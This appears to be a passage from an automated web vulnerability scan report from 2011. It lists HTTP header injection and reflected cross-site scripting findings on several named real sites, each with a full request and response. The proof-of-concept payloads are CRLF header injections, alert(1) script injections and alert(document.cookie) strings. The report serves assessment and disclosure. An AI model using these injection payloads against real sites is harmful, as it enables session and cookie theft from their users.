<img src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" title="Ultimate Caption FAIL, FAIL" data-thumb="//i1.ytimg.com/vi/hVNrkXM3TTI/default.jpg" alt="Thumbnail" class="" onmousedown="yt.analytics.urchinTracker('/Events/Home/PersonalizedHome/TOP/Logged_Out/28');" >
...[SNIP]...

Request 2

GET /?q=bluefin+tuna&hl=en&tab=n1 HTTP/1.1
Host: www.youtube.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=%2527%2527

Response 2

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:57:33 GMT
Server: Apache
X-Content-Type-Options: nosniff
Set-Cookie: use_hitbox=72c46ff6cbcdb7c5585c36411b6b334edAEAAAAw; path=/; domain=.youtube.com
Set-Cookie: VISITOR_INFO1_LIVE=7W9y3yp9dBk; path=/; domain=.youtube.com; expires=Sat, 01-Oct-2011 01:57:33 GMT
Set-Cookie: PREF=f1=50000000; path=/; domain=.youtube.com; expires=Sun, 31-Jan-2021 01:57:33 GMT
Set-Cookie: GEO=bc7103ce4190df0c025f1e8acab27b75cwsAAAAzR0KtwdbzTUoLjQ==; path=/; domain=.youtube.com
Expires: Tue, 27 Apr 1971 19:44:06 EST
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Connection: close

<!DOCTYPE html>
<html lang="en" dir="ltr" >
<!-- machid: nLThsU052OXJEdFZ1el9MdThWQy1DcWhubzU0LXdXb18zOW5TYkdOeWdFc3dZV1JacW5PM3Bn -->
<head>
<script>
var yt = yt || {};

yt.timing
...[SNIP]...

2. HTTP header injection  previous  next
There are 4 instances of this issue:

Issue background

HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.

Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.

Issue remediation

If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.


2.1. http://bs.serving-sys.com/BurstingPipe/adServer.bs [eyeblaster cookie]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/adServer.bs

Issue detail

The value of the eyeblaster cookie is copied into the Set-Cookie response header. The payload e98b7%0d%0a72138907069 was submitted in the eyeblaster cookie. This caused a response containing an injected HTTP header.

Request

GET /BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2171139&PluID=0&w=728&h=90&ord=[timestamp]&ucm=true HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://thehill.com/blogs/e2-wire/677-e2-wire650aa'%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E2295b33377e/137679-news-bites-dispute-over-tuna-spotlights-oil-spills-effects-drilling-court-case-moves-ahead-and-more
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u3=1; C4=; A3=f+JvabEk02WG00002h5iUabNz07l00000Qh5j3abNz07l00000.gn3Ka4JO09MY00001gNfHaaiN0aVX00001fU+La50V0a+r00001fUFGa50V02WG00001gy3.ach00c9M00001cRreabeg03Dk00001gy7La9bU0c9M00003gy5Da9bU0c9M00001gCTVa9bU0c9M00001gvKEacgY0c9M00001ge4Gack+0bM000001ge4Hack+0bM000001; B3=7lgH0000000001sG89PS000000000QsZ89PT000000000.sZ852G0000000003sS7dNH0000000002sZ7GHq0000000001s.7FCH0000000001s.83xP0000000001sF8cVQ0000000001sV852N0000000001s.87ma0000000001s.6o.Q0000000001sY7gi30000000001sG852z0000000001sS852A0000000001sS; eyeblaster=BWVal=408&BWDate=40573.510532&debuglevel=&FLV=10.1103&RES=128&WMPV=0e98b7%0d%0a72138907069; ActivityInfo=000p81bBo%5f; u2=1b39b065-3668-4ab4-a4dc-a28fe9442aaf3G601g

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: eyeblaster=BWVal=408&BWDate=40573.510532&debuglevel=&FLV=10.1103&RES=128&WMPV=0e98b7
72138907069
; expires=Tue, 03-May-2011 20: 57:40 GMT; domain=bs.serving-sys.com; path=/
Set-Cookie: A3=h5j3abNz07l00000.h5iUabNz07l00000Qf+JvabEk02WG00002gNfHaaiN0aVX00001gn3Ka4JO09MY00001fU+La50V0a+r00001gYx+adwF0cvM00001fUFGa50V02WG00001gy3.ach00c9M00001cRreabeg03Dk00001gy7La9bU0c9M00003gCTVa9bU0c9M00001gy5Da9bU0c9M00001gvKEacgY0c9M00001ge4Gack+0bM000001ge4Hack+0bM000001; expires=Tue, 03-May-2011 20:57:40 GMT; domain=.serving-sys.com; path=/
Set-Cookie: B3=89PS000000000QsZ7lgH0000000001sG89PT000000000.sZ852G0000000003sS7dNH0000000002sZ7GHq0000000001s.7FCH0000000001s.8cVQ0000000001sV83xP0000000001sF852N0000000001s.6o.Q0000000001sY87ma0000000001s.8i430000000001t27gi30000000001sG852z0000000001sS852A0000000001sS; expires=Tue, 03-May-2011 20:57:40 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u2=1b39b065-3668-4ab4-a4dc-a28fe9442aaf3G601g; expires=Tue, 03-May-2011 20:57:40 GMT; domain=.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Thu, 03 Feb 2011 01:57:39 GMT
Connection: close
Content-Length: 1696

var ebPtcl="http://";var ebBigS="ds.serving-sys.com/BurstingCachedScripts/";var ebResourcePath="ds.serving-sys.com/BurstingRes//";var ebRand=new String(Math.random());ebRand=ebRand.substr(ebRand.index
...[SNIP]...

2.2. http://locators.bankofamerica.com/locator/locator/LocatorAction.do [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/LocatorAction.do

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload 44609%0d%0a823a43cd739 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /locator/locator/44609%0d%0a823a43cd739 HTTP/1.1
Host: locators.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 02 Feb 2011 22:10:48 GMT
Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8e-fips-rhel5 mod_jk/1.2.26
Set-Cookie: JSESSIONID=6B551B6EF292368753CEA0B23B3B8F3A.ftb-web4; Path=/locator/locator
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/44609
823a43cd739
?shouldTest=true
Content-Language: en-US
Content-Length: 0
Connection: close
Content-Type: text/plain


2.3. http://www.fis.com/fis/worldnews/worldnews.asp [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fis.com
Path:   /fis/worldnews/worldnews.asp

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 49dfd%0d%0ab7061f6f456 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /49dfd%0d%0ab7061f6f456/worldnews/worldnews.asp HTTP/1.1
Host: www.fis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Object moved
Server: Microsoft-IIS/5.0
Date: Thu, 03 Feb 2011 01:52:12 GMT
Connection: close
Location: /fis/error/error.asp?404;http://www.fis.com/49dfd
b7061f6f456
/worldnews/worldnews.asp


2.4. http://www.fis.com/fis/worldnews/worldnews.asp [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fis.com
Path:   /fis/worldnews/worldnews.asp

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload d412c%0d%0ad95cbc5e854 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /fis/d412c%0d%0ad95cbc5e854/worldnews.asp HTTP/1.1
Host: www.fis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Object moved
Server: Microsoft-IIS/5.0
Date: Thu, 03 Feb 2011 01:52:17 GMT
Connection: close
Location: /fis/error/error.asp?404;http://www.fis.com/fis/d412c
d95cbc5e854
/worldnews.asp


3. Cross-site scripting (reflected)  previous  next
There are 182 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


3.1. http://ad.thehill.com/www/delivery/al.php [shifth parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.thehill.com
Path:   /www/delivery/al.php

Issue detail

The value of the shifth request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 66993%3balert(1)//766c94fef6e was submitted in the shifth parameter. This input was echoed as 66993;alert(1)//766c94fef6e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www/delivery/al.php?zoneid=113&cb=INSERT_RANDOM_NUMBER_HERE&layerstyle=simple&align=center&valign=middle&padding=2&closetime=8&padding=2&shifth=066993%3balert(1)//766c94fef6e&shiftv=0&closebutton=t&backcolor=FFFFFF&bordercolor=000000 HTTP/1.1
Host: ad.thehill.com
Proxy-Connection: keep-alive
Referer: http://thehill.com/blogs/e2-wire/677-e2-wire650aa'%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E2295b33377e/137679-news-bites-dispute-over-tuna-spotlights-oil-spills-effects-drilling-court-case-moves-ahead-and-more
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAID=308f74733f72a0ba99b5c2e36e2aaec4

Response

HTTP/1.1 200 OK
X-Powered-By: PHP/5.1.6
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Date: Thu, 03 Feb 2011 01:32:17 GMT
Content-type: application/x-javascript
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: OAID=308f74733f72a0ba99b5c2e36e2aaec4; expires=Fri, 03-Feb-2012 01:32:17 GMT; path=/
Server: lighttpd/1.4.22
Content-Length: 4484

var MAX_b295a9fa = '';
MAX_b295a9fa += "<"+"div id=\"MAX_b295a9fa\" style=\"position:absolute; width:306px; height:267px; z-index:99; left: 0px; top: 0px; visibility: hidden\">\n";
MAX_b295a9fa += "<"
...[SNIP]...
cumentElement.scrollTop;
       of = 0;
   }
   else
   {
       sl = window.pageXOffset;
       st = window.pageYOffset;

       if (window.opera)
           of = 0;
       else
           of = 16;
   }

        c[_s].left = parseInt(sl+(iw - 306) / 2 +066993;alert(1)//766c94fef6e) + (window.opera?'':'px');
        c[_s].top = parseInt(st+(ih - 267) / 2 +0) + (window.opera?'':'px');

   c[_s].visibility = MAX_adlayers_visible_b295a9fa;
}


function MAX_simplepop_b295a9fa(what)
{
   var
...[SNIP]...

3.2. http://ad.thehill.com/www/delivery/al.php [shiftv parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.thehill.com
Path:   /www/delivery/al.php

Issue detail

The value of the shiftv request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 7de03%3balert(1)//1688d5789ce was submitted in the shiftv parameter. This input was echoed as 7de03;alert(1)//1688d5789ce in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www/delivery/al.php?zoneid=113&cb=INSERT_RANDOM_NUMBER_HERE&layerstyle=simple&align=center&valign=middle&padding=2&closetime=8&padding=2&shifth=0&shiftv=07de03%3balert(1)//1688d5789ce&closebutton=t&backcolor=FFFFFF&bordercolor=000000 HTTP/1.1
Host: ad.thehill.com
Proxy-Connection: keep-alive
Referer: http://thehill.com/blogs/e2-wire/677-e2-wire650aa'%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E2295b33377e/137679-news-bites-dispute-over-tuna-spotlights-oil-spills-effects-drilling-court-case-moves-ahead-and-more
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAID=308f74733f72a0ba99b5c2e36e2aaec4

Response

HTTP/1.1 200 OK
X-Powered-By: PHP/5.1.6
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Date: Thu, 03 Feb 2011 01:32:12 GMT
Content-type: application/x-javascript
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: OAID=308f74733f72a0ba99b5c2e36e2aaec4; expires=Fri, 03-Feb-2012 01:32:12 GMT; path=/
Server: lighttpd/1.4.22
Content-Length: 4484

var MAX_fedee667 = '';
MAX_fedee667 += "<"+"div id=\"MAX_fedee667\" style=\"position:absolute; width:306px; height:267px; z-index:99; left: 0px; top: 0px; visibility: hidden\">\n";
MAX_fedee667 += "<"
...[SNIP]...
;
       st = window.pageYOffset;

       if (window.opera)
           of = 0;
       else
           of = 16;
   }

        c[_s].left = parseInt(sl+(iw - 306) / 2 +0) + (window.opera?'':'px');
        c[_s].top = parseInt(st+(ih - 267) / 2 +07de03;alert(1)//1688d5789ce) + (window.opera?'':'px');

   c[_s].visibility = MAX_adlayers_visible_fedee667;
}


function MAX_simplepop_fedee667(what)
{
   var c = MAX_findObj('MAX_fedee667');

   if (!c)
       return false;

   if (c.style
...[SNIP]...

3.3. http://api.facebook.com/restserver.php [method parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.facebook.com
Path:   /restserver.php

Issue detail

The value of the method request parameter is copied into the HTML document as plain text between tags. The payload 6c818<img%20src%3da%20onerror%3dalert(1)>15cd25761cc was submitted in the method parameter. This input was echoed as 6c818<img src=a onerror=alert(1)>15cd25761cc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /restserver.php?v=1.0&method=links.getStats6c818<img%20src%3da%20onerror%3dalert(1)>15cd25761cc&urls=%5B%22http%3A%2F%2Fnews.change.org%2Fstories%2Fnobu-ignores-18000-people-asking-for-an-end-to-bluefin-sushi%23share_source%3Dblog-top_fb%22%5D&format=json&callback=fb_sharepro_render HTTP/1.1
Host: api.facebook.com
Proxy-Connection: keep-alive
Referer: http://news.change.org/stories/nobu-ignores-18000-people-asking-for-an-end-to-bluefin-sushi?7bf2b%3C/script%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E36bc7e08caf=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dehow.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwww.ehow.com%252F%26extra_2%3DUS; datr=8CJHTYhjyotVYfKpZ5B35lnF

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Type: text/javascript;charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-Cnection: close
Date: Thu, 03 Feb 2011 01:33:00 GMT
Content-Length: 427

fb_sharepro_render({"error_code":3,"error_msg":"Unknown method","request_args":[{"key":"v","value":"1.0"},{"key":"method","value":"links.getStats6c818<img src=a onerror=alert(1)>15cd25761cc"},{"key":"urls","value":"[\"http:\/\/news.change.org\/stories\/nobu-ignores-18000-people-asking-for-an-end-to-bluefin-sushi#share_source=blog-top_fb\"]"},{"key":"format","value":"json"},{"key":"callba
...[SNIP]...

3.4. http://api.facebook.com/restserver.php [urls parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.facebook.com
Path:   /restserver.php

Issue detail

The value of the urls request parameter is copied into the HTML document as plain text between tags. The payload 7250b<img%20src%3da%20onerror%3dalert(1)>3afeaa161d5 was submitted in the urls parameter. This input was echoed as 7250b<img src=a onerror=alert(1)>3afeaa161d5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /restserver.php?v=1.0&method=links.getStats&urls=%5B%22http%3A%2F%2Fnews.change.org%2Fstories%2Fnobu-ignores-18000-people-asking-for-an-end-to-bluefin-sushi%23share_source%3Dblog-top_fb%22%5D7250b<img%20src%3da%20onerror%3dalert(1)>3afeaa161d5&format=json&callback=fb_sharepro_render HTTP/1.1
Host: api.facebook.com
Proxy-Connection: keep-alive
Referer: http://news.change.org/stories/nobu-ignores-18000-people-asking-for-an-end-to-bluefin-sushi?7bf2b%3C/script%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E36bc7e08caf=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dehow.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwww.ehow.com%252F%26extra_2%3DUS; datr=8CJHTYhjyotVYfKpZ5B35lnF

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=120
Content-Type: text/javascript;charset=utf-8
Expires: Wed, 02 Feb 2011 17:35:11 -0800
Pragma:
X-Cnection: close
Date: Thu, 03 Feb 2011 01:33:11 GMT
Content-Length: 443

fb_sharepro_render({"error_code":114,"error_msg":"param urls must be an array.","request_args":[{"key":"v","value":"1.0"},{"key":"method","value":"links.getStats"},{"key":"urls","value":"[\"http:\/\/news.change.org\/stories\/nobu-ignores-18000-people-asking-for-an-end-to-bluefin-sushi#share_source=blog-top_fb\"]7250b<img src=a onerror=alert(1)>3afeaa161d5"},{"key":"format","value":"json"},{"key":"callback","value":"fb_sharepro_render"}]});

3.5. http://api.viglink.com/api/click [format parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.viglink.com
Path:   /api/click

Issue detail

The value of the format request parameter is copied into the HTML document as plain text between tags. The payload 9ff8c<script>alert(1)</script>d0cbfd0ba59 was submitted in the format parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /api/click?format=jsonp9ff8c<script>alert(1)</script>d0cbfd0ba59&key=4f085ab2452b05f4c24c6b37dbc58a3b&loc=http%3A%2F%2Fcommunity.invisionpower.com%2Ftopic%2F330971-ipnexus-113-released%2Fpage__pid__2073390%23entry2073390&subId=d59e71895dde9e0dbe7525217bd974&v=1&libid=1296685545288&out=http%3A%2F%2Fwww.invisionpower.com%2Fproducts%2Fnexus%2F&ref=http%3A%2F%2Fcommunity.invisionpower.com%2F&title=IP.Nexus%201.1.3%20Released%20-%20Invision%20Power%20Services&txt=IP.Nexus%20application&jsonp=vglnk_jsonp_12966856382491 HTTP/1.1
Host: api.viglink.com
Proxy-Connection: keep-alive
Referer: http://community.invisionpower.com/topic/330971-ipnexus-113-released/page__pid__2073390
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: vglnk.Agent.p=412aef8ac4db8eca6d18ab69d3a4b53c

Response

HTTP/1.1 400 Bad Request
Cache-Control: no-store, no-cache, must-revalidate
Content-Type: text/plain
Date: Wed, 02 Feb 2011 23:58:36 GMT
Expires: Sat, 06 May 1995 12:00:00 GMT
Pragma: no-cache
Content-Length: 71
Connection: keep-alive

Unrecognized format: 'jsonp9ff8c<script>alert(1)</script>d0cbfd0ba59'

3.6. http://api.viglink.com/api/click [jsonp parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.viglink.com
Path:   /api/click

Issue detail

The value of the jsonp request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload e7c41%3balert(1)//89d5419dbd6 was submitted in the jsonp parameter. This input was echoed as e7c41;alert(1)//89d5419dbd6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /api/click?format=jsonp&key=4f085ab2452b05f4c24c6b37dbc58a3b&loc=http%3A%2F%2Fcommunity.invisionpower.com%2Ftopic%2F330971-ipnexus-113-released%2Fpage__pid__2073390%23entry2073390&subId=d59e71895dde9e0dbe7525217bd974&v=1&libid=1296685545288&out=http%3A%2F%2Fwww.invisionpower.com%2Fproducts%2Fnexus%2F&ref=http%3A%2F%2Fcommunity.invisionpower.com%2F&title=IP.Nexus%201.1.3%20Released%20-%20Invision%20Power%20Services&txt=IP.Nexus%20application&jsonp=vglnk_jsonp_12966856382491e7c41%3balert(1)//89d5419dbd6 HTTP/1.1
Host: api.viglink.com
Proxy-Connection: keep-alive
Referer: http://community.invisionpower.com/topic/330971-ipnexus-113-released/page__pid__2073390
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: vglnk.Agent.p=412aef8ac4db8eca6d18ab69d3a4b53c

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate
Content-Type: text/javascript
Date: Wed, 02 Feb 2011 23:58:43 GMT
Expires: Sat, 06 May 1995 12:00:00 GMT
Pragma: no-cache
Content-Length: 102
Connection: keep-alive

vglnk_jsonp_12966856382491e7c41;alert(1)//89d5419dbd6('http://www.invisionpower.com/products/nexus/');

3.7. http://api.viglink.com/api/click [out parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.viglink.com
Path:   /api/click

Issue detail

The value of the out request parameter is copied into the HTML document as plain text between tags. The payload 89bf8<script>alert(1)</script>0d35527ef71 was submitted in the out parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /api/click?format=jsonp&key=4f085ab2452b05f4c24c6b37dbc58a3b&loc=http%3A%2F%2Fcommunity.invisionpower.com%2Ftopic%2F330971-ipnexus-113-released%2Fpage__pid__2073390%23entry2073390&subId=d59e71895dde9e0dbe7525217bd974&v=1&libid=1296685545288&out=89bf8<script>alert(1)</script>0d35527ef71&ref=http%3A%2F%2Fcommunity.invisionpower.com%2F&title=IP.Nexus%201.1.3%20Released%20-%20Invision%20Power%20Services&txt=IP.Nexus%20application&jsonp=vglnk_jsonp_12966856382491 HTTP/1.1
Host: api.viglink.com
Proxy-Connection: keep-alive
Referer: http://community.invisionpower.com/topic/330971-ipnexus-113-released/page__pid__2073390
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: vglnk.Agent.p=412aef8ac4db8eca6d18ab69d3a4b53c

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate
Content-Type: text/javascript
Date: Wed, 02 Feb 2011 23:58:41 GMT
Expires: Sat, 06 May 1995 12:00:00 GMT
Pragma: no-cache
Content-Length: 72
Connection: keep-alive

vglnk_jsonp_12966856382491('89bf8<script>alert(1)</script>0d35527ef71');

3.8. http://api.viglink.com/api/click [out parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.viglink.com
Path:   /api/click

Issue detail

The value of the out request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 875ad'%3balert(1)//6f691d8d147 was submitted in the out parameter. This input was echoed as 875ad';alert(1)//6f691d8d147 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /api/click?format=jsonp&key=4f085ab2452b05f4c24c6b37dbc58a3b&loc=http%3A%2F%2Fcommunity.invisionpower.com%2Ftopic%2F330971-ipnexus-113-released%2Fpage__pid__2073390%23entry2073390&subId=d59e71895dde9e0dbe7525217bd974&v=1&libid=1296685545288&out=http%3A%2F%2Fwww.invisionpower.com%2Fproducts%2Fnexus%2F875ad'%3balert(1)//6f691d8d147&ref=http%3A%2F%2Fcommunity.invisionpower.com%2F&title=IP.Nexus%201.1.3%20Released%20-%20Invision%20Power%20Services&txt=IP.Nexus%20application&jsonp=vglnk_jsonp_12966856382491 HTTP/1.1
Host: api.viglink.com
Proxy-Connection: keep-alive
Referer: http://community.invisionpower.com/topic/330971-ipnexus-113-released/page__pid__2073390
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: vglnk.Agent.p=412aef8ac4db8eca6d18ab69d3a4b53c

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate
Content-Type: text/javascript
Date: Wed, 02 Feb 2011 23:58:38 GMT
Expires: Sat, 06 May 1995 12:00:00 GMT
Pragma: no-cache
Content-Length: 103
Connection: keep-alive

vglnk_jsonp_12966856382491('http://www.invisionpower.com/products/nexus/875ad';alert(1)//6f691d8d147');

3.9. http://api.viglink.com/api/ping [key parameter]  previous  next

Summary

Severity:   High
